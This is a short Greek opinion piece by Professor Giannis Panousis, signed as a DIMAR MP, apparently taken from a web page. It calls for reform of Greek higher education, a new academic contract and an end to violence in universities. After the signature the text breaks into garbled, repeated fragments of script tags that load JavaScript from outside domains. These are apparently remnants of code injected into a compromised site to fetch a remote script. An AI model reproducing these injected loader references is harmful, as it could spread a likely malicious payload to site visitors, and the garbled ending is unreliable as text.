Θέλει αρετήν και τόλμην – Γιάννης Πανούσης

1

Αταίριαστες χρονολογίες στέκουνε ανάμεσά μας
μύθων ανάγνωση η εμβολή και η παραμυθία.
Στέλιος Μαφρέδας, Επιβάτης πορθμείου

  •  Έχουμε ανάγκη από αναβάθμιση της παιδείας (και όχι της εκπαίδευσης) ως αυτοσκοπού για την αξιακή υπέρβαση της κρίσης και την προοπτική ανάπτυξης.
  • Έχουμε ανάγκη από ένα νέο κοινωνικο-ακαδημαϊκό συμβόλαιο που ν’ ανταποκρίνεται στις πανεπιστημιακές προκλήσεις του 2020.
  • Έχουμε ανάγκη από ένα νέο θεσμικό πλαίσιο (και όχι απλώς από ένα νόμο), το οποίο θα συνυπογράψουν μετά από διαβούλευση όλοι οι φορείς της τριτοβάθμιας εκπαίδευσης (καθηγητές, φοιτητές, διοικητικοί κλπ).
  • Έχουμε ανάγκη από ιδρύματα ελευθερίας, ευθύνης, συμμετοχής, αριστείας που σε αγαστή συνεργασία με τα ερευνητικά κέντρα θα δημιουργήσουν ένα δίκτυο παραγωγής και διάδοσης νέας γνώσης.
  • Έχουμε ανάγκη να κλείσουμε τους όποιους ανοικτούς λογαριασμούς με τις αντιλήψεις της Μεταπολίτευσης περί της συγχύσεως της ανομίας με την ακαδημαϊκή ελευθερία και της αυθαιρεσίας με τη δημοκρατική συμμετοχή.
  • Έχουμε ανάγκη από προσωπική και συλλογική ειλικρίνεια, ανυπόκριτη αλλαγή στάσεων όλων, αυτοσυγκράτηση στις αντι-παρα-θέσεις, οριστική απόρριψη της βίας ως τρόπου επίλυσης των διαφορών.
  • Έχουμε ανάγκη…

Αρετή, αυτογνωσία και κότσια ν’ αλλάξουμε την κατάσταση όμως έχουμε;

Καθηγητής Γιάννης Πανούσης

Βουλευτής ΔΗΜΑΡ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >